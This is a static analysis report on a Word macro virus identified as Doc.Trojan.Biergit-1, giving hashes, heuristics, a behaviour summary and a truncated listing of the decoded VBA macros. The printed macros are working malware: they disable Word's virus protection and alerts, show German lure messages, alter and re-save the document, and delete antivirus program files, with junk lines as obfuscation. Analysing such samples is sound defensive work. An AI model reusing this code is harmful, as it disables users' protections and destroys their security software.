Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 adbe029bce0a97ad…

MALICIOUS

Office (OLE)

Size: 42.5 KB
Created: 1999-06-14 17:39:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f3f03f7310ed781281f016e6e0d6500c
SHA-1: dae5589a5ab5c028da93e6f25d3c1e84bfe25ff4
SHA-256: adbe029bce0a97ad780947d5fdde2a2a6fb63ad2f9d6bb1403bf6c785d1c3a22
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros, identified by ClamAV as Doc.Trojan.Biergit-1. The extracted macro first disables Word's protective settings (WordBasic.DisableAutoMacros, Options.VirusProtection = False, DisplayAlerts = wdAlertsNone, EnableCancelKey = wdCancelDisabled). On the 19th of the month it shows a German-language message box and an Office Assistant balloon as a social engineering lure, replaces the word "blau" with "gelb" throughout the document, re-saves the file, and calls a second routine that deletes files from several antivirus product directories (McAfee VirusScan, Dr Solomon's Anti-Virus Toolkit, TBAV). The meaningless string assignments interleaved between every statement are obfuscation padding. The macros and the deliberate disabling of antivirus protection indicate malicious intent, likely to deceive the user or download further malicious content; note, however, that the extracted preview contains no download or network code, and the destructive behaviour it shows is the deletion of antivirus files.

Heuristics (2)

  • ClamAV: Doc.Trojan.Biergit-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Biergit-1
  • VBA macros detected [medium, OLE_VBA_MACROS]
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7562 bytes
SHA-256: 5bd2eb1f970e4d4ddd26db2aafacc65468cd5cab41c394d33b9bc4d560f4095d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Birgit"
Sub VnFoTh6416()

KxPxJhRyTnPpNfEoEt = VlMhJuBiPoIzTlBfMp & CoOgVlGxLjBmLpSkHf11772805
On Error Resume Next
MfDxHjUiVxChImOfRq = AoEhEyMzIoJvRhAgMu & DlAwSmGiOfAgViIqRx26722063
WordBasic.DisableAutoMacros 0
UvSpRrKvPnMuAmHqJi = SzIiSoAyOvJpPiVeNm & UeIpHtCrEeKxSxDvMh43321609
ActiveDocument.ReadOnlyRecommended = False
BzHoOuNfRyVnRtSiBf = UgAiNsKtIvKlNeUeMq & VxPjEuCxIwJrGqOfBy5828867
With Application
DhSoMwQmTmIfMeHvPy = AjOjIwVnCvLhLvTeLv & AuAzBuDiLsImRkElLu7323125
.EnableCancelKey = wdCancelDisabled
MxKgAjHyMyTsEeVkGr = RtRkAnJnIgLxJxTyMm & RmItMgVrBrShOyVpGe89839671
.DisplayAlerts = wdAlertsNone
OfVgUlKjPmGkVlKxUo = TxJkRrThBgMtHsSyMr & SjQnJhVxFnRxCsKvQw4808928
End With
AwOuItAvIyQxNlDmMg = PlMmJiHhHnNnEuSwNj & OyBgVoRkQmFsVkFeLg21408475
With Options
DzDtGwDgKnDpIsOeEz = RoEmEmSxBnOjDpRwMn & PvJwRpSrUiEmJeRkAy36357733
.ConfirmConversions = False
FhNtDyGmMxMiDzDrSw = SsSmAqGsQmPfBlQxLs & PsQqOpSxBeDgTtGqKu51316991
.VirusProtection = False
NxGlOkTzGnBvRzRgJp = OgVnNhQsAtPvUmQvMj & LlCkExOkNzNxQmBvFe67916537
End With
QfRlLnAjIxKnMkGtBm = QjNoIlFmQtQrTiPvMo & MiJeAyOrRvMrEfNfPw82865795
If Day(Now()) = 19 Then
CwJzAvMwBnVeEkUiPe = LuQpAxPmAeQlQjPtNg & HwRtMjLeGuAmBuIkKg99465341
MsgBox "Wo versteckst Du dich, Birgit?", vbOkOnly, "Birgit"
FzUyTyPgEyHsVrJwGx = NxJpRfDgPeRhOfOtMk & ItDnJkLlKqVgLnTqVy14434599
With Selection.Find
HhJyReSnGmQkQyUnUv = PeBpNjOxJeSzNwNtLp & JqKiFkLrOmTxAhJwJu29383857
.Text = "blau"
PyCqFmJzVyFxIyNyMn = LpErEwCwPlStKyMrMg & EjSxRsHeDlIsTvEeEe45983403
.Replacement.Text = "gelb"
PlEfMlUfIwTyDwRjFf = SeRgIvRwAvEfSsFoUf & FuAxGiSmJgAfFxPxFh4779355
.Wrap = wdFindContinue
BgTtAtLsBmIpRwKuTu = OpUhAmFwGgEvQuFmVs & BnIqRqOvVfKwCqKgAn64399901
End With
EjItTwOyDxRhMhVlKr = PsMiRqPqAgFrOpEmUx & BkQkOqPgCxJqMjVmKj79359159
Selection.Find.Execute Replace:=wdReplaceAll
MeBlIiFpSmGuFhNxCj = LgPjJhDqGnFlLqEkVo & TyBeDyLpOwTlJyQqFp95958705
ActiveDocument.SaveAs ActiveDocument.FullName
OiLlFlIvVxOmAoCoQg = NkHjElOkVnGhKmDkUt & UvJuAzLwSsSfTrGwQl10917963
' Printer payload!
Assistant.Visible = True
RlAkDnKgBlBfQvNfIz = PnVjVpDfPnHzIiCkUy & VsQoTzMgVoQvHlRhEh25877221
With Assistant.NewBalloon
DgPyNvBsQxMsJvFqVs = KxDlNgMeVuHtFjCiVp & QlChIlIpLnFqEzMlVn42476767
.Icon = msoIconAlert
GkEyLyEzTmVkEgQhNp = MfRlIkBvPuIpEfBjUu & RiJxFlIwPjDkPtCrKi57426025
.Text = "Sorry, ich bin ein Virus..."
OeSqVkRpMxKxSgJtFh = IpUnAwLuUeJjBgBgVl & MwRrRtEjEiOfLlTwFo74025571
.Heading = "B I R G I T"
QiHqTmUwOmTpNnUkTe = KsMnReApOeKfVyAhUq & NtDlNuFpIeNvAfIgPk88984829
.Animation = msoAnimationSearching
TlSpQpBgQwFhIuJxKy = MwEnMiKkIeLxUtVhTu & OqKfKuFwLwLqKuUmDg3954087
.Show
FgLhFxNtKmQvAuBmCq = HkHoEvUjOlLrRvUfVm & JjSuAgBjBvAlHnPrUm20543633
End With
IkVhCeQzMxDnRfMzQn = JnVoVzJeHlMnPqTfUr & KgDoTgBpFrUfRhExJi35502891
Assistant.Visible = False
QeOvMmHqFmOeJeFpIf = FyCqNqTzNsMhNrTzVi & FuLiIoTzQqJwOvAfEo52102437
Call FjPoCr1108
SiDvKoKwIxBsElPgVy = GfQqIuHuHsNzLnSzUn & GsSyFpUjUmHqCpLmOk67061695
End If
VmOuIrNhKlJkVtEtNw = IiIqEySoBsOvJjReTr & HpEsCpUqCiGkMiBsCg8201953
End Sub
Sub FjPoCr1108()
HgGmSzDtDxUxNsTiFo = EtLsRpGoGzOpHkRyUj & DhMlNxQzNhQfJxSwTm9861500
On Error Resume Next
JkRmQfGeFlHpIzIvTl = GwDsNtQiAzPlFgQyUo & DeTfKxRjRzPvTqHgIi13589757
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
SfKeEoTqVxShAzAkKz = BkHtEkEiGjQfChQwVf & VtFvVjNsGyEqQjClDo30189303
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
UiVeBqAxBmFvRkLyCx = DoVtVnPyAjRxBzPwUk & AqMpSkNzKuCkFyOrNk45138561
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
BmJzVtDhDwNnMrApQu = FrNuRrDtPjStVuOwTo & AnUjPkNjOqBfPsDxBg60097819
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
JhCrJfPuSmCeErPeIm = BfQvIiNsVqSnSwNuUg & SfFyEsJsDpLwMkUgTm76697365
Kill ("C:\TBAV\TBAV.DAT")
LkNrHhSeVwLsVyErVj = CjIvEmCnPqTjRrMuUl & TyNsBsKzHlKqAeKmHi91646623
... (truncated)